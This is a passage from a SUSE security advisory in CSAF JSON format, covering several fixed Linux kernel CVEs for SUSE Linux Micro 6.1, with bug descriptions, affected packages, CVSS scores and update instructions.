"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53819",
"url": "https://www.suse.com/security/cve/CVE-2023-53819"
},
{
"category": "external",
"summary": "SUSE Bug 1254712 for CVE-2023-53819",
"url": "https://bugzilla.suse.com/1254712"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53819"
},
{
"cve": "CVE-2023-53821",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53821"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nip6_vti: fix slab-use-after-free in decode_session6\n\nWhen ipv6_vti device is set to the qdisc of the sfb type, the cb field\nof the sent skb may be modified during enqueuing. Then,\nslab-use-after-free may occur when ipv6_vti device sends IPv6 packets.\n\nThe stack information is as follows:\nBUG: KASAN: slab-use-after-free in decode_session6+0x103f/0x1890\nRead of size 1 at addr ffff88802e08edc2 by task swapper/0/0\nCPU: 0 PID: 0 Comm: swapper/0 Not tainted 6.4.0-next-20230707-00001-g84e2cad7f979 #410\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-1.fc33 04/01/2014\nCall Trace:\n\u003cIRQ\u003e\ndump_stack_lvl+0xd9/0x150\nprint_address_description.constprop.0+0x2c/0x3c0\nkasan_report+0x11d/0x130\ndecode_session6+0x103f/0x1890\n__xfrm_decode_session+0x54/0xb0\nvti6_tnl_xmit+0x3e6/0x1ee0\ndev_hard_start_xmit+0x187/0x700\nsch_direct_xmit+0x1a3/0xc30\n__qdisc_run+0x510/0x17a0\n__dev_queue_xmit+0x2215/0x3b10\nneigh_connected_output+0x3c2/0x550\nip6_finish_output2+0x55a/0x1550\nip6_finish_output+0x6b9/0x1270\nip6_output+0x1f1/0x540\nndisc_send_skb+0xa63/0x1890\nndisc_send_rs+0x132/0x6f0\naddrconf_rs_timer+0x3f1/0x870\ncall_timer_fn+0x1a0/0x580\nexpire_timers+0x29b/0x4b0\nrun_timer_softirq+0x326/0x910\n__do_softirq+0x1d4/0x905\nirq_exit_rcu+0xb7/0x120\nsysvec_apic_timer_interrupt+0x97/0xc0\n\u003c/IRQ\u003e\nAllocated by task 9176:\nkasan_save_stack+0x22/0x40\nkasan_set_track+0x25/0x30\n__kasan_slab_alloc+0x7f/0x90\nkmem_cache_alloc_node+0x1cd/0x410\nkmalloc_reserve+0x165/0x270\n__alloc_skb+0x129/0x330\nnetlink_sendmsg+0x9b1/0xe30\nsock_sendmsg+0xde/0x190\n____sys_sendmsg+0x739/0x920\n___sys_sendmsg+0x110/0x1b0\n__sys_sendmsg+0xf7/0x1c0\ndo_syscall_64+0x39/0xb0\nentry_SYSCALL_64_after_hwframe+0x63/0xcd\nFreed by task 9176:\nkasan_save_stack+0x22/0x40\nkasan_set_track+0x25/0x30\nkasan_save_free_info+0x2b/0x40\n____kasan_slab_free+0x160/0x1c0\nslab_free_freelist_hook+0x11b/0x220\nkmem_cache_free+0xf0/0x490\nskb_free_head+0x17f/0x1b0\nskb_release_data+0x59c/0x850\nconsume_skb+0xd2/0x170\nnetlink_unicast+0x54f/0x7f0\nnetlink_sendmsg+0x926/0xe30\nsock_sendmsg+0xde/0x190\n____sys_sendmsg+0x739/0x920\n___sys_sendmsg+0x110/0x1b0\n__sys_sendmsg+0xf7/0x1c0\ndo_syscall_64+0x39/0xb0\nentry_SYSCALL_64_after_hwframe+0x63/0xcd\nThe buggy address belongs to the object at ffff88802e08ed00\nwhich belongs to the cache skbuff_small_head of size 640\nThe buggy address is located 194 bytes inside of\nfreed 640-byte region [ffff88802e08ed00, ffff88802e08ef80)\n\nAs commit f855691975bb (\"xfrm6: Fix the nexthdr offset in\n_decode_session6.\") showed, xfrm_decode_session was originally intended\nonly for the receive path. IP6CB(skb)-\u003enhoff is not set during\ntransmission. Therefore, set the cb field in the skb to 0 before\nsending packets.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53821",
"url": "https://www.suse.com/security/cve/CVE-2023-53821"
},
{
"category": "external",
"summary": "SUSE Bug 1254669 for CVE-2023-53821",
"url": "https://bugzilla.suse.com/1254669"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53821"
},
{
"cve": "CVE-2023-53823",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53823"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nblock/rq_qos: protect rq_qos apis with a new lock\n\ncommit 50e34d78815e (\"block: disable the elevator int del_gendisk\")\nmove rq_qos_exit() from disk_release() to del_gendisk(), this will\nintroduce some problems:\n\n1) If rq_qos_add() is triggered by enabling iocost/iolatency through\n cgroupfs, then it can concurrent with del_gendisk(), it\u0027s not safe to\n write \u0027q-\u003erq_qos\u0027 concurrently.\n\n2) Activate cgroup policy that is relied on rq_qos will call\n rq_qos_add() and blkcg_activate_policy(), and if rq_qos_exit() is\n called in the middle, null-ptr-dereference will be triggered in\n blkcg_activate_policy().\n\n3) blkg_conf_open_bdev() can call blkdev_get_no_open() first to find the\n disk, then if rq_qos_exit() from del_gendisk() is done before\n rq_qos_add(), then memory will be leaked.\n\nThis patch add a new disk level mutex \u0027rq_qos_mutex\u0027:\n\n1) The lock will protect rq_qos_exit() directly.\n\n2) For wbt that doesn\u0027t relied on blk-cgroup, rq_qos_add() can only be\n called from disk initialization for now because wbt can\u0027t be\n destructed until rq_qos_exit(), so it\u0027s safe not to protect wbt for\n now. Hoever, in case that rq_qos dynamically destruction is supported\n in the furture, this patch also protect rq_qos_add() from wbt_init()\n directly, this is enough because blk-sysfs already synchronize\n writers with disk removal.\n\n3) For iocost and iolatency, in order to synchronize disk removal and\n cgroup configuration, the lock is held after blkdev_get_no_open()\n from blkg_conf_open_bdev(), and is released in blkg_conf_exit().\n In order to fix the above memory leak, disk_live() is checked after\n holding the new lock.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53823",
"url": "https://www.suse.com/security/cve/CVE-2023-53823"
},
{
"category": "external",
"summary": "SUSE Bug 1254691 for CVE-2023-53823",
"url": "https://bugzilla.suse.com/1254691"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53823"
},
{
"cve": "CVE-2023-53825",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53825"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nkcm: Fix error handling for SOCK_DGRAM in kcm_sendmsg().\n\nsyzkaller found a memory leak in kcm_sendmsg(), and commit c821a88bd720\n(\"kcm: Fix memory leak in error path of kcm_sendmsg()\") suppressed it by\nupdating kcm_tx_msg(head)-\u003elast_skb if partial data is copied so that the\nfollowing sendmsg() will resume from the skb.\n\nHowever, we cannot know how many bytes were copied when we get the error.\nThus, we could mess up the MSG_MORE queue.\n\nWhen kcm_sendmsg() fails for SOCK_DGRAM, we should purge the queue as we\ndo so for UDP by udp_flush_pending_frames().\n\nEven without this change, when the error occurred, the following sendmsg()\nresumed from a wrong skb and the queue was messed up. However, we have\nyet to get such a report, and only syzkaller stumbled on it. So, this\ncan be changed safely.\n\nNote this does not change SOCK_SEQPACKET behaviour.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53825",
"url": "https://www.suse.com/security/cve/CVE-2023-53825"
},
{
"category": "external",
"summary": "SUSE Bug 1254707 for CVE-2023-53825",
"url": "https://bugzilla.suse.com/1254707"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53825"
},
{
"cve": "CVE-2023-53828",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53828"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: hci_sync: Avoid use-after-free in dbg for hci_add_adv_monitor()\n\nKSAN reports use-after-free in hci_add_adv_monitor().\n\nWhile adding an adv monitor,\n hci_add_adv_monitor() calls -\u003e\n msft_add_monitor_pattern() calls -\u003e\n msft_add_monitor_sync() calls -\u003e\n msft_le_monitor_advertisement_cb() calls in an error case -\u003e\n hci_free_adv_monitor() which frees the *moniter.\n\nThis is referenced by bt_dev_dbg() in hci_add_adv_monitor().\n\nFix the bt_dev_dbg() by using handle instead of monitor-\u003ehandle.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53828",
"url": "https://www.suse.com/security/cve/CVE-2023-53828"
},
{
"category": "external",
"summary": "SUSE Bug 1254623 for CVE-2023-53828",
"url": "https://bugzilla.suse.com/1254623"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
